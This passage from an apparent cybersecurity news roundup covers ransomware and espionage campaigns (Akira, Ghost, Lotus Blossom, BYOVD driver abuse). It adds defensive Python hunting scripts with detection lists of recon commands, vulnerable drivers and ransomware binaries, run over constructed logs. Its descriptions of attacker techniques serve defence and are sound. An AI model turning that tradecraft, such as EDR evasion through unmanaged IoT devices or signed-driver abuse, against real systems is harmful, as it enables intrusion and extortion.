During this time, sensitive personal and medical data — including names, addresses, dates of birth, Social Security numbers, driver’s license details, medical records, and health insurance information—were compromised. According to its filing with the Maine Attorney General’s Office, the breach impacted 220,968 individuals.

Meanwhile, CCA experienced a similar data breach in July last year. The organization reported that cybercriminals stole extensive patient information, including names, addresses, dates of birth, driver's license numbers, Social Security numbers, diagnoses, lab results, prescriptions, patient ID numbers, and provider details. The breach affected 114,945 individuals, as per its filing with Maine’s Attorney General’s Office.

The Rhysida ransomware group has claimed possession of 7.6TB of Sunflower’s data, including a 3TB SQL database, according to The Register. With the data still listed online, it suggests that either negotiations are ongoing or have collapsed. However, as of now, there is no confirmed evidence of the stolen data being misused on the dark web.

Following these incidents, both organizations have taken steps to strengthen cybersecurity measures to prevent future breaches.

Cyberattacks on Key Vendors Trigger Widespread Disruptions Across Industries

Cybercriminals are increasingly targeting a single point of failure within companies to create large-scale disruption, according to a recent report by Resilience. The analysis highlights how such attacks can have a ripple effect across entire industries.

In 2024, the global average cost of a data breach was estimated at nearly $4.9 million, based on IBM research. However, certain incidents proved to be significantly more damaging.

One of the most costly breaches occurred when UnitedHealth reported a staggering $3.1 billion expenditure in response to a cyberattack on its Change Healthcare subsidiary. This division processes billions of medical claims annually, and the ransomware attack led to prolonged disruptions in the healthcare sector.

“It was the most significant and consequential cyberattack in the history of U.S. health care,” said John Riggi, national advisor for cybersecurity and risk at the American Hospital Association, in a blog post.

Another major incident targeted CDK Global, a software provider for car dealerships across the U.S. The ransomware attack caused financial damages exceeding $1 billion collectively, as estimated by Anderson Economic Group.

The cyberattacks on Change Healthcare and CDK Global exemplify how disruptions in interconnected organizations can have widespread industry consequences, Resilience noted in its report.

According to Resilience’s analysis, third-party risks have become a leading factor in cyber insurance claims, representing 31% of claims filed by its clients in 2024. While a slightly higher percentage (37%) of third-party claims was recorded in 2023, none resulted in material financial losses.

The study also revealed that ransomware attacks targeting vendors have become a “new and significant” contributor to insurance claims, accounting for 18% of such cases.

Although ransomware remained the primary cause of cyber losses in 2024, responsible for 62% of claims, its overall frequency may be declining. Resilience attributes this to cybercriminals shifting toward larger, high-profile organizations that offer bigger payouts, moving away from the traditional "spray and pray" strategy.

Webcam Exploited by Ransomware Group to Circumvent EDR Protections

 


Researchers at S-RM have documented an unusual technique used by the Akira ransomware gang: encrypting a victim's network from an unsecured webcam. The pivot let the attackers bypass the Endpoint Detection and Response (EDR) product that had successfully stopped the ransomware encryptor from running on the victim's Windows machines.

During an incident response engagement, the S-RM team watched Akira adapt to the victim's defences. The threat actors first tried to run their encryptor on Windows endpoints, and the victim's EDR solution blocked those attempts.

The attackers responded by using the unsecured webcam, already sitting on the internal network, as the machine from which the encryptor would run. The incident shows how ransomware operators are turning to unconventional footholds to get around modern defences.

Network vulnerabilities exploited by Akira ransomware operators


The attack began with an externally exposed remote access solution, through which the threat actors gained unauthorized access to the network. They then installed AnyDesk.exe, a legitimate remote desktop tool, to keep persistent access, and used it to exfiltrate sensitive data. 

After the initial breach, the attackers moved laterally over the Remote Desktop Protocol (RDP), mimicking routine system administrator activity so that their movements blended into normal operations and evaded detection. 

Akira Ransomware Group: A Rising Threat in the Cybercrime Landscape 


Emergence and Rapid Expansion 


First identified in early 2023, Akira has quickly become one of the most active ransomware operations in the world. In 2024 it accounted for around 15% of all ransomware incidents examined by cybersecurity firm S-RM. The group mainly targets small and medium-sized businesses (SMEs) in North America, Europe, and Australia, particularly organisations with fewer than 1,000 employees. 

Operational Model and Organizational Structure 


Akira runs a ransomware-as-a-service model: the group's core developers maintain the platform, the encryptor binary and the leak site, and affiliates who carry out the intrusions use them in exchange for a share of the ransom payments. 

Triple Extortion Strategy and Technical Adaptability 


Akira maximises its leverage over victims through triple extortion, stacking three layers of coercion: 

Data Encryption – Locking files and systems to disrupt business operations. 

Data Exfiltration – Stealing sensitive information before encryption. 

Public Disclosure Threats – Threatening to release exfiltrated data unless the ransom is paid. 

Akira's technical adaptability shows in how it adjusts its methods to the defences it meets. The webcam attack is a case in point: the group got around Endpoint Detection and Response (EDR) protections by using an unmanaged Internet of Things device as an alternative place to run its encryptor. 

As ransomware operations such as Akira become more sophisticated, organizations, particularly small and medium-sized enterprises, must take proactive cybersecurity measures to mitigate the threats posed by these highly adaptive threat actors. To mitigate these risks, organizations must implement robust endpoint security, network segmentation, and IoT security protocols. 

Initial access came through the exposed remote access solution, most likely using stolen credentials or brute force. Once inside, the attackers deployed AnyDesk, a legitimate remote access tool, for persistence and used it to exfiltrate sensitive data, which later served as leverage in a double extortion scheme. 

They then moved laterally over RDP, spreading across multiple systems before staging the ransomware as a password-protected archive, win.zip, containing the payload win.exe. The victim's Endpoint Detection and Response (EDR) system detected and quarantined the payload, and that attempt failed. 

Rather than abandon the objective, the attackers went back to the results of an earlier internal network scan. It showed several IoT devices with no endpoint protection, including a webcam and a fingerprint scanner. S-RM explains that the webcam was chosen as the pivot for three reasons: it exposed a remote shell (and unauthorized access to its video feed); it ran a lightweight Linux-based operating system compatible with Akira's Linux encryptor; and its limited storage meant it could not host an EDR agent, so nothing on the device would inspect what ran on it. 

Execution of the Attack Through IoT Exploitation 

From the compromised webcam, the attackers used its connectivity to the internal network to reach the victim's Windows file shares over the Server Message Block (SMB) protocol and ran the Linux encryptor against them. Files across the network were encrypted without the ransomware ever executing on a protected Windows host. Because the organisation did not monitor its IoT devices, the burst of SMB traffic from a webcam to a Windows server raised no alarm, and the operators worked covertly. Encrypting over SMB is generally slower than running an encryptor locally, but it was highly effective here precisely because it sidestepped the tooling that had blocked the first attempt. 

The incident makes the case that every network-connected device, IoT endpoints most of all, must be inventoried, patched and managed, so that ransomware operators cannot use them as an unmonitored staging point. Regular vulnerability assessments of internal networks, and network segmentation that limits what connected devices can talk to (a webcam has no reason to reach a file server over SMB), close off the route used here. 

Turning off IoT devices when they are not in use is a further, simple preventive measure. Continuous network monitoring that covers east-west traffic, not just endpoints, is what would have caught this attack. With ransomware-as-a-service (RaaS) operations continuing to evolve rapidly, organisations must keep improving their defences to stay ahead of increasingly sophisticated attacks.
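The monitoring gap in this case was SMB traffic from a device class that should never speak SMB. The script below is an added example, not part of the S-RM report or this post: it runs over a constructed, simplified flow export (the column layout, the 10.0.50.0/24 IoT VLAN and the 10.0.10.0/24 file-server VLAN are all assumptions) and reports every IoT source that opened SMB sessions, rating a source that touches several servers or moves a large volume as the mass-encryption signature rather than a stray misconfiguration.

```python
"""Flag SMB sessions whose source is a device class with no business speaking SMB (the IoT VLAN)
and summarise how many servers each such source touched. Added example over constructed flow records."""
import csv
import io
import ipaddress
from collections import defaultdict

# Constructed flow records (a simplified firewall/NetFlow export; not from the S-RM report).
# 10.0.50.0/24 is assumed to be the IoT VLAN, 10.0.10.0/24 the file-server VLAN.
# 10.0.50.23 plays the webcam, 10.0.50.40 the fingerprint scanner, 10.0.20.101 a workstation.
SAMPLE_FLOWS = """\
ts,src_ip,src_port,dst_ip,dst_port,proto,bytes_out
2025-03-05T02:14:07Z,10.0.50.23,49152,10.0.10.5,445,tcp,18432211
2025-03-05T02:14:09Z,10.0.50.23,49153,10.0.10.6,445,tcp,20331100
2025-03-05T02:15:01Z,10.0.50.23,49154,10.0.10.7,445,tcp,9911002
2025-03-05T02:16:00Z,10.0.20.101,51000,10.0.10.5,445,tcp,120331
2025-03-05T02:16:30Z,10.0.50.23,49155,203.0.113.9,443,tcp,3021
2025-03-05T02:17:00Z,10.0.50.40,40001,10.0.10.5,445,tcp,512
"""

IOT_NETS = [ipaddress.ip_network("10.0.50.0/24")]   # assumed IoT address space
SMB_PORTS = {445, 139}


def find_smb_from_iot(flow_csv, iot_nets=IOT_NETS, smb_ports=SMB_PORTS):
    """Return {src_ip: {"destinations": set, "bytes_out": int, "flows": int}}
    for every IoT source that opened an SMB session. Non-SMB flows and
    workstation sources are ignored; a workstation talking SMB is normal."""
    hits = defaultdict(lambda: {"destinations": set(), "bytes_out": 0, "flows": 0})
    for row in csv.DictReader(io.StringIO(flow_csv)):
        if row["proto"] != "tcp" or int(row["dst_port"]) not in smb_ports:
            continue
        src = ipaddress.ip_address(row["src_ip"])
        if not any(src in net for net in iot_nets):
            continue
        entry = hits[row["src_ip"]]
        entry["destinations"].add(row["dst_ip"])
        entry["bytes_out"] += int(row["bytes_out"])
        entry["flows"] += 1
    return dict(hits)


def severity(entry, many_hosts=2, big_transfer=10_000_000):
    """A single tiny SMB flow is probably a misconfiguration; an IoT device writing tens of
    megabytes to several servers looks like encryption over SMB. Thresholds are assumptions."""
    if len(entry["destinations"]) >= many_hosts or entry["bytes_out"] >= big_transfer:
        return "high"
    return "medium"


if __name__ == "__main__":
    for src, entry in find_smb_from_iot(SAMPLE_FLOWS).items():
        print(f"{severity(entry):6} {src} -> {sorted(entry['destinations'])} "
              f"({entry['flows']} flows, {entry['bytes_out']} bytes out)")
```

The same rule expressed as a segmentation policy (deny TCP/445 and TCP/139 from the IoT VLAN to everything) would have stopped the attack rather than merely detecting it; the detection is the fallback for networks where that policy is not yet in place.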

Persistent Increase in Ransomware Attacks Raises Global Security Concerns

 


Ransomware attacks targeting the United States rose sharply in the first five weeks of 2025, nearly 150% above the same period of 2024. A series of high-profile incidents in which organisations chose to pay the ransom has made the U.S. a more attractive target, because successful payments encourage further attacks. 

That factor goes a long way toward explaining the rise in activity over the last few months. Although the most active groups and the precise timing have fluctuated, the frequency of ransomware incidents in the United States has increased substantially over the past year, with a marked rise since autumn 2024 that has continued into the new year. Security firm NCC Group counted 590 new ransomware victims in January, a 3% increase over the previous month, which had already set a record. 

Threat intelligence firm Cyble counted 518 new victims in January and 599 in the 27 days that followed; roughly two-thirds of the attacks hit organisations in the United States. Other monitoring organisations have also noted a rise over the past two months. Victim counts differ between firms because their methodologies differ, in particular over whether organisations compromised earlier but only now listed on a leak site should count as new victims. 

Despite these discrepancies, industry experts agree that ransomware activity has increased in recent months. Several groups are driving the increase, with RansomHub, Play, and Akira among the most prominent, and organisations across the globe are facing the consequences. The threat is persistent even though individual groups come and go. 

Some groups, such as Black Basta, are in decline or nearing obsolescence, while others, LockBit among them, have been disrupted by law enforcement. Groups also collapse over internal conflict, often about money. Alphv, also known as BlackCat, pulled an exit scam 12 months ago, keeping the entire $22 million ransom paid by UnitedHealth Group after the Change Healthcare hack rather than sharing it with the affiliate that carried out the attack. 

Although some groups disbanded at the end of last year, the landscape remains highly dynamic, with new actors constantly appearing. Many of these "new" groups are rebrands, or are run by people already entrenched in the cybercrime ecosystem. A significant share of attacks comes from affiliates, threat actors who work with several ransomware operations at once, regardless of which group's name ends up on the ransom note. According to cybersecurity firm BlackFog, 48 new ransomware groups surfaced in 2024. 

Threat intelligence firm Cyble reports that RunSomeWare has listed four victims on its data leak site and Linkc just one; how long such newcomers survive is unclear. Anubis, a Russian-speaking group first active in December 2024, appears from the sophistication of its tactics to be the work of former ransomware affiliates. 

Kela reports that Anubis maintains a presence on cybercrime forums such as RAMP and XSS, keeping itself visible within the criminal underground. Alongside a range of illicit services, the group runs a conventional ransomware-as-a-service model in which affiliates keep 80% of the ransoms collected from the victims they infect. Its ransomware targets Windows, Linux, network-attached storage (NAS), and ESXi environments, and the group runs a Tor-based data leak blog that so far lists only a handful of victims. 

Anubis also offers two services beyond conventional ransomware. The first is data-ransom-as-a-service: participants receive 60% of the revenue extorted from victims using stolen data. To qualify, the data must be unpublished, obtained within the past six months, and valuable enough that public exposure would hurt. Anubis says it amplifies the pressure on victims by issuing a press release and notifying local data privacy regulators of the breach. 

The second offering targets initial access brokers (IABs), who sell credentials for compromised networks. Under Anubis' model, an IAB receives 50% of any ransom extracted from a victim whose access it supplied. Eligibility rules apply: the victim must be in the United States, Canada, Europe, or Australia, must not have been hit by another ransomware group in the last 12 months, and must not be a government, educational, or non-profit organisation. Healthcare organisations remain fair game. 

Ransomware groups have long worked with initial access brokers and have often paid a premium for exclusive access to compromised networks; their growing reliance on brokers shows that the brokers' role in the cybercrime economy is expanding. According to a recent CrowdStrike report, access broker activity grew by almost 50% in 2024 compared with the previous year, as criminals looked for faster and stealthier ways into high-value targets. 


Hackers Exploit Flaw in Microsoft-Signed Driver to Launch Ransomware Attacks

 



Cybercriminals are exploiting a vulnerability in a Microsoft-signed driver developed by Paragon Software, known as BioNTdrv.sys, to carry out ransomware attacks. This driver, part of Paragon Partition Manager, is typically used to manage hard drive space, but hackers have found a way to misuse it for malicious purposes.  


How the Attack Works  

The vulnerability, identified as CVE-2025-0289, lets attackers use a technique called "bring your own vulnerable driver" (BYOVD): they drop the legitimate, validly signed but flawed driver onto a system, load it, and exploit it to gain high-level access. With SYSTEM-level privileges they can execute ransomware, steal data, or disable security software with little chance of being caught.  

The alarming part is that Paragon Partition Manager does not need to be installed on the target: the attacker brings a copy of the driver, and Windows loads it because its signature is valid.  
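Because the driver carries a valid signature, signature checks alone will not catch BYOVD; the signals are the driver's identity and where it was loaded from. The script below is an added example, not Microsoft's or Paragon's tooling: it classifies constructed Sysmon Event ID 6 (DriverLoad) records, flagging a known-vulnerable driver name regardless of signature status, a driver loaded from outside the normal driver directories, and an unsigned driver. Only the driver named in this post is in the name list; in practice the list would be fed from a maintained source such as loldrivers.io (an assumed workflow), and the directory list is an assumption about a default Windows install.

```python
"""Hunt driver-load telemetry (Sysmon Event ID 6 fields) for bring-your-own-vulnerable-driver activity.
Added example over constructed records; the name and directory lists are assumptions."""
import ntpath

# Driver file names known to be exploitable. Only the one named in this post is listed;
# feed this from a maintained list (e.g. loldrivers.io) in a real deployment.
VULNERABLE_DRIVER_NAMES = {"biontdrv.sys"}

# Directories a legitimate driver install writes to. Anything else is worth a look.
TRUSTED_DRIVER_DIRS = (r"c:\windows\system32\drivers", r"c:\windows\system32\driverstore")

# Constructed Sysmon Event ID 6 (DriverLoad) records; not real telemetry.
SAMPLE_DRIVER_LOADS = [
    {"UtcTime": "2025-03-01 10:02:11", "ImageLoaded": r"C:\Windows\System32\drivers\ndis.sys",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"UtcTime": "2025-03-01 10:31:40", "ImageLoaded": r"C:\ProgramData\update\BioNTdrv.sys",
     "Signed": "true", "Signature": "Microsoft Windows Hardware Compatibility Publisher",
     "SignatureStatus": "Valid"},
    {"UtcTime": "2025-03-01 10:32:02", "ImageLoaded": r"C:\Users\Public\svc.sys",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
]


def assess_driver_load(event):
    """Return the list of reasons this driver load is suspicious (empty list = benign)."""
    path = event["ImageLoaded"]
    name = ntpath.basename(path).lower()
    reasons = []
    if name in VULNERABLE_DRIVER_NAMES:
        # A valid Microsoft signature is exactly what makes BYOVD work, so the signature
        # status is reported for context but never used to clear a known-vulnerable driver.
        reasons.append(f"known vulnerable driver {name} "
                       f"(signature: {event.get('SignatureStatus', '?')})")
    if not path.lower().startswith(TRUSTED_DRIVER_DIRS):
        reasons.append("loaded from outside the normal driver directories")
    if event.get("Signed", "").lower() != "true" or event.get("SignatureStatus") != "Valid":
        reasons.append("unsigned or invalid signature")
    return reasons


def hunt(events):
    """Map each suspicious ImageLoaded path to its list of reasons; benign loads are omitted."""
    return {e["ImageLoaded"]: r for e in events if (r := assess_driver_load(e))}


if __name__ == "__main__":
    for path, reasons in hunt(SAMPLE_DRIVER_LOADS).items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Matching on file name is deliberately weak (the attacker can rename the file), so a production version would add the driver's hash and its signer certificate to the lookup; the path and signature heuristics are what remain when the name has been changed.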


Other Vulnerabilities  

Researchers also found four additional flaws in the driver:  

1. CVE-2025-0288: Allows access to kernel memory, helping attackers gain control.  

2. CVE-2025-0287: Can crash the system using a null pointer error.  

3. CVE-2025-0286: Enables attackers to execute malicious code in kernel memory.  

4. CVE-2025-0285: Allows manipulation of kernel memory, escalating control. 


Response from Microsoft and Paragon  

Microsoft confirmed that hackers are already using this flaw to spread ransomware and has responded by blocking the vulnerable driver through its Vulnerable Driver Blocklist. Meanwhile, Paragon Software has released a security patch and advised users to update their drivers immediately to avoid potential risks.  


How to Stay Safe  

To protect your system from these attacks:  

1. Update your drivers from Paragon Software to the latest version.  

2. Install Windows security updates regularly.  

3. Use reliable antivirus software to detect suspicious activities.  

4. Monitor your system for unexpected crashes or slow performance.    

While Microsoft and Paragon Software have taken steps to contain the damage, users must stay proactive in securing their systems through regular updates and vigilant monitoring. It is also worth confirming that the Microsoft Vulnerable Driver Blocklist is actually enabled on each machine, since a signed driver that is not on an enforced blocklist will still load.

Cybersecurity Threats Are Evolving: Seven Key OT Security Challenges

 

Cyberattacks are advancing rapidly, threatening businesses with QR code scams, deepfake fraud, malware, and evolving ransomware. Strengthening cybersecurity measures can mitigate the risk, and addressing these seven key OT security challenges is essential.

Insurance broker Howden reports that U.K. businesses lost $55 billion to cyberattacks in five years. Basic security measures could save $4.4 million over a decade, delivering a 25% ROI.

Experts at IDS-INDATA warn that outdated OT systems are prime hacker entry points, with 60% of breaches stemming from unpatched systems. Research across industries identifies seven major OT security challenges.

Seven Critical OT Security Challenges

1. Ransomware & AI-Driven Attacks
Ransomware-as-a-Service and AI-powered malware are escalating threats. “The speed at which attack methods evolve makes waiting to update your defences risky,” says Ryan Cooke, CISO at IDS-INDATA. Regular updates and advanced threat detection systems are vital.

2. Outdated Systems & Patch Gaps
Many industrial networks rely on legacy systems. “We know OT is a different environment from IT,” Cooke explains. Where patches aren’t feasible, alternative mitigation is necessary. Regular audits help address vulnerabilities.

3. Lack of OT Device Visibility
Limited visibility makes networks vulnerable. “Without visibility over your connected OT devices, it’s impossible to secure them,” says Cooke. Asset discovery tools help monitor unauthorized access.

4. Growing IoT Complexity
IoT expansion increases security risks. “As more IoT and smart devices are integrated into industrial networks, the complexity of securing them grows exponentially,” Cooke warns. Prioritizing high-risk devices is essential.

5. Financial & Operational Risks
Breaches can cause financial losses, production shutdowns, and life-threatening risks. “A breach in OT environments can cause financial loss, shut down entire production lines, or, in extreme cases, endanger lives,” Cooke states. A strong incident response plan is crucial.

6. Compliance with Evolving Regulations
Non-compliance with OT security regulations leads to financial penalties. Regular audits ensure adherence and minimize risks.

7. Human Error & Awareness Gaps
Misconfigured security settings remain a major vulnerability. “Investing in cybersecurity awareness training for your OT teams is critical,” Cooke advises. Security training and monitoring help prevent insider threats.

“Proactively addressing these points will help significantly reduce the risk of compromise, protect critical infrastructure, ensure compliance, and safeguard against potentially severe disruptions,” Cooke concluded. 

Cyberattacks will persist regardless, but proactively addressing these challenges significantly improves the chances of defending against them.

Cisco Talos Uncovers Lotus Blossom’s Multi-Campaign Cyber Espionage Operations

Cisco Talos has uncovered a series of cyber espionage campaigns attributed to the advanced persistent threat (APT) group Lotus Blossom, also known as Spring Dragon, Billbug, and Thrip. 

The group has been active since at least 2012, targeting government, manufacturing, telecommunications, and media sectors in regions such as the Philippines, Vietnam, Hong Kong, and Taiwan. Talos identified Sagerunex, a backdoor tool used exclusively by Lotus Blossom, as the core malware in these campaigns. 

The investigation revealed multiple variants of Sagerunex, evolving from its original form to leverage third-party cloud services such as Dropbox, Twitter, and Zimbra webmail as command-and-control (C2) tunnels, instead of traditional Virtual Private Servers (VPS). This shift helps the group evade detection while maintaining control over infected endpoints. 

The group has been observed gaining persistence on compromised systems by storing Sagerunex in the Windows registry and configuring it to run as a service. The malware is a dynamic link library (DLL) that is loaded and executed directly in memory, which limits the artifacts left on disk. The campaigns also showcase long-term persistence strategies, allowing attackers to remain undetected for months. 

Beyond Sagerunex, Lotus Blossom employs an arsenal of hacking tools to facilitate credential theft, privilege escalation, and data exfiltration. These include a Chrome cookie stealer from GitHub, a customized Venom proxy tool, a privilege adjustment tool, and an archiving tool for encrypting and stealing data. 

Additionally, the group utilizes mtrain V1.01, a modified HTran proxy relay tool, to route connections between compromised machines and external networks. The attack chain follows a structured multi-stage approach, starting with reconnaissance commands such as “net,” “tasklist,” “ipconfig,” and “netstat” to gather system details. 

If an infected machine lacks direct internet access, the attackers leverage the system's proxy settings or the Venom tool to establish connectivity. A notable tactic involves storing malicious tools in the “public\pictures” subfolder (C:\Users\Public\Pictures), a directory writable by every user of the machine and rarely scrutinized, to avoid detection.
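The behaviours described above (a burst of built-in reconnaissance commands, tooling staged under C:\Users\Public\Pictures, and a service-hosted DLL) are all visible in process-creation telemetry. The hunt below is an added example, not Talos' code or a published detection; it assumes a constructed pipe-separated event format (timestamp|host|parent|image|command line), and the thresholds and host-process list are assumptions to tune for your environment.

```python
"""Hunt for the Lotus Blossom tradecraft described above in process-creation logs.

Added example (not Cisco Talos' code). Event format, sample events, thresholds
and the list of DLL host processes are all assumptions made for illustration.
"""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

# Built-in tools the report names as the first reconnaissance step.
RECON_BINARIES = {"net.exe", "tasklist.exe", "ipconfig.exe", "netstat.exe"}
RECON_WINDOW = timedelta(minutes=5)   # assumed window
RECON_THRESHOLD = 3                   # distinct recon tools on one host within the window
STAGING_DIR = r"c:\users\public\pictures"
SERVICE_HOSTS = {"rundll32.exe", "svchost.exe", "regsvr32.exe"}  # assumed DLL hosts

# Constructed sample: one host running the recon chain, then a service-launched
# DLL staged in Public\Pictures; a second host running a lone ipconfig (benign).
SAMPLE_EVENTS = r"""
2025-03-01T09:00:01|WS-07|explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe
2025-03-01T09:00:05|WS-07|cmd.exe|C:\Windows\System32\net.exe|net user
2025-03-01T09:00:09|WS-07|cmd.exe|C:\Windows\System32\tasklist.exe|tasklist /v
2025-03-01T09:00:14|WS-07|cmd.exe|C:\Windows\System32\ipconfig.exe|ipconfig /all
2025-03-01T09:00:20|WS-07|cmd.exe|C:\Windows\System32\netstat.exe|netstat -ano
2025-03-01T09:03:40|WS-07|services.exe|C:\Windows\System32\rundll32.exe|rundll32.exe C:\Users\Public\Pictures\upd.dll,Start
2025-03-01T09:30:00|WS-12|explorer.exe|C:\Windows\System32\ipconfig.exe|ipconfig
"""


def parse_events(text: str) -> list[dict]:
    """Parse timestamp|host|parent|image|cmdline lines into sorted event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append({
            "time": datetime.fromisoformat(ts),
            "host": host,
            "parent": parent.lower(),
            "image": image.lower(),
            "basename": ntpath.basename(image).lower(),
            "cmdline": cmdline.lower(),
        })
    return sorted(events, key=lambda e: e["time"])


def recon_bursts(events: list[dict]) -> list[tuple[str, str, str]]:
    """Flag a host that runs RECON_THRESHOLD distinct recon tools within RECON_WINDOW."""
    findings = []
    by_host = defaultdict(list)
    for e in events:
        if e["basename"] in RECON_BINARIES:
            by_host[e["host"]].append(e)
    for host, evs in by_host.items():
        for i, e in enumerate(evs):
            window = [x for x in evs[: i + 1] if e["time"] - x["time"] <= RECON_WINDOW]
            seen = {x["basename"] for x in window}
            if len(seen) >= RECON_THRESHOLD:
                findings.append((host, "recon-burst", ", ".join(sorted(seen))))
                break  # one finding per host is enough
    return findings


def staging_in_public_pictures(events: list[dict]) -> list[tuple[str, str, str]]:
    """Flag any image or command line that references the Public\\Pictures staging path."""
    return [(e["host"], "public-pictures-staging", e["cmdline"])
            for e in events
            if STAGING_DIR in e["image"] or STAGING_DIR in e["cmdline"]]


def service_hosted_dll(events: list[dict]) -> list[tuple[str, str, str]]:
    """Flag a service (child of services.exe) loading a DLL from outside C:\\Windows."""
    return [(e["host"], "service-hosted-dll", e["cmdline"])
            for e in events
            if e["parent"] == "services.exe"
            and e["basename"] in SERVICE_HOSTS
            and ".dll" in e["cmdline"]
            and r"c:\windows" not in e["cmdline"]]


def hunt(text: str = SAMPLE_EVENTS) -> list[tuple[str, str, str]]:
    events = parse_events(text)
    return recon_bursts(events) + staging_in_public_pictures(events) + service_hosted_dll(events)


if __name__ == "__main__":
    for host, rule, detail in hunt():
        print(f"{host}: {rule}: {detail}")
```

On the constructed sample only WS-07 is reported, once for each rule; the lone ipconfig on WS-12 stays below the recon threshold. Against real Sysmon or EDR data, map the five fields from your schema and expect to tune the window and the DLL host list before alerting on the recon rule.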

Talos’ research underscores the growing sophistication of Lotus Blossom, which continues to refine its techniques and expand its capabilities. With high confidence, Cisco attributes these campaigns to Lotus Blossom, highlighting its sustained cyber espionage operations against high-value targets.

FBI Warns: ‘Ghost’ Ransomware Is Spreading— Here’s How to Stay Safe

The Federal Bureau of Investigation (FBI) has released an urgent alert about a growing cyber threat known as Ghost ransomware. This group has been attacking various organizations across more than 70 countries, locking victims out of their own systems and demanding payment to restore access. In response, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have advised businesses and individuals to back up their data and strengthen their cybersecurity measures to prevent potential attacks.  


Who Is Behind the Ghost Ransomware?  

The Ghost ransomware group is a team of cybercriminals whose ransomware encrypts data, making it unusable unless a ransom is paid. Unlike groups that trick people into clicking harmful links or handing over credentials (phishing attacks), Ghost takes a different approach: it exploits known security flaws in outdated software and firmware to break into systems, so the victim does not need to take any action at all.  

Cybersecurity experts believe that Ghost operates from China and has used multiple names over time, including Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. These different names suggest the group has been active for a long time and may have carried out various attacks under different identities.  


How Does Ghost Ransomware Work?  

Since early 2021, Ghost ransomware has been targeting systems with outdated software and firmware. The hackers search for weaknesses in these systems and use publicly available hacking tools to gain access and install ransomware. Once inside, they encrypt important files and demand payment to unlock them.  

The FBI has identified several ransomware files linked to Ghost, including Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe. These files have been used to lock data in critical industries such as healthcare, education, government services, manufacturing, technology, and small businesses. The impact has been severe, affecting essential services and causing financial losses.  


How to Stay Protected from Ghost Ransomware

The FBI has recommended several security steps to reduce the risk of being attacked:  

1. Create Secure Backups: Keep offline backups of important data so that even if ransomware encrypts your files, you can restore them without paying a ransom. Many organizations that had proper backups were able to recover quickly.  

2. Update Software and Firmware: Hackers often target outdated programs with security flaws. Ensure that your operating system, applications, and firmware are regularly updated with the latest security patches.  

3. Recognize Cyber Threats: While Ghost does not typically use phishing, it is still essential to train employees and individuals to identify suspicious activity and avoid downloading unknown files or clicking on unverified links.  

4. Monitor Network Activity: Keep an eye on unusual behavior in your network, such as unexpected logins, file modifications, or unauthorized access. Detecting an attack early can help prevent major damage.  
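Step 4 is the one a defender can turn into a concrete control. The script below is an added example, not FBI or CISA code: it runs the two checks a ransomware monitoring rule needs over file-audit events, namely a match on the executable names the alert lists and a burst of one process renaming or rewriting many files in a short window, the pattern encryption produces on a file share. The pipe-separated event format, the sample events and the thresholds are assumptions for illustration.

```python
"""Spot ransomware-style activity in file-audit events, per the FBI advice above.

Added example (not FBI/CISA code). Assumes a constructed event format
timestamp|host|process|action|path, with RENAME paths written as "old -> new".
Thresholds are assumptions to tune per file server.
"""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

# Executable names the FBI alert associates with Ghost (compared case-insensitively).
KNOWN_GHOST_BINARIES = {"cring.exe", "ghost.exe", "elysiumo.exe", "locker.exe"}
BURST_WINDOW = timedelta(seconds=60)
BURST_THRESHOLD = 20  # distinct files one process touches per window (assumed)


def build_sample_events() -> str:
    """Constructed events: one benign save, one encryption-like burst, one IOC hit."""
    base = datetime(2025, 2, 20, 2, 15, 0)
    lines = [f"{base.isoformat()}|FS-01|WINWORD.EXE|WRITE|D:\\share\\q1.docx"]
    for i in range(30):  # 30 renames to a new extension in 30 seconds
        t = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{t}|FS-01|setup.exe|RENAME|D:\\share\\report{i}.xlsx -> D:\\share\\report{i}.xlsx.locked")
    t = (base + timedelta(minutes=5)).isoformat()
    lines.append(f"{t}|FS-02|Locker.exe|WRITE|C:\\Users\\bob\\readme.txt")
    return "\n".join(lines)


def parse_events(text: str) -> list[dict]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, process, action, path = line.split("|", 4)
        old, _, new = path.partition(" -> ")
        events.append({
            "time": datetime.fromisoformat(ts),
            "host": host,
            "process": process.lower(),
            "action": action,
            "path": old.strip(),
            "new_path": new.strip() or None,
        })
    return sorted(events, key=lambda e: e["time"])


def detect(events: list[dict]) -> list[tuple[str, str, str]]:
    findings = []
    by_proc = defaultdict(list)
    seen_ioc = set()
    for e in events:
        # Check 1: a process name from the alert, reported once per host.
        if e["process"] in KNOWN_GHOST_BINARIES and (e["host"], e["process"]) not in seen_ioc:
            seen_ioc.add((e["host"], e["process"]))
            findings.append((e["host"], "known-ghost-binary", e["process"]))
        by_proc[(e["host"], e["process"])].append(e)
    # Check 2: one process touching BURST_THRESHOLD distinct files inside BURST_WINDOW.
    for (host, proc), evs in by_proc.items():
        for i, e in enumerate(evs):
            window = [x for x in evs[: i + 1] if e["time"] - x["time"] <= BURST_WINDOW]
            files = {x["path"] for x in window}
            if len(files) >= BURST_THRESHOLD:
                new_exts = sorted({ntpath.splitext(x["new_path"])[1] for x in window if x["new_path"]})
                findings.append((host, "mass-file-modification",
                                 f"{proc} touched {len(files)} files in {BURST_WINDOW.seconds}s; "
                                 f"new extensions: {new_exts}"))
                break  # one finding per process is enough
    return findings


def run(text: str | None = None) -> list[tuple[str, str, str]]:
    return detect(parse_events(text if text is not None else build_sample_events()))


if __name__ == "__main__":
    for host, rule, detail in run():
        print(f"{host}: {rule}: {detail}")
```

The name match is cheap but brittle, since an operator can rename a binary; the burst rule is what catches an unknown locker, and the new-extension list it reports tells the responder which files to look for during recovery. Backup and indexing jobs will trip the burst rule, so allowlist those processes rather than raising the threshold.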


Cyber threats like Ghost ransomware continue to evolve, but staying informed and taking these preventive measures can help reduce the risk of falling victim to an attack. The FBI urges everyone to act now and secure their data before it’s too late.


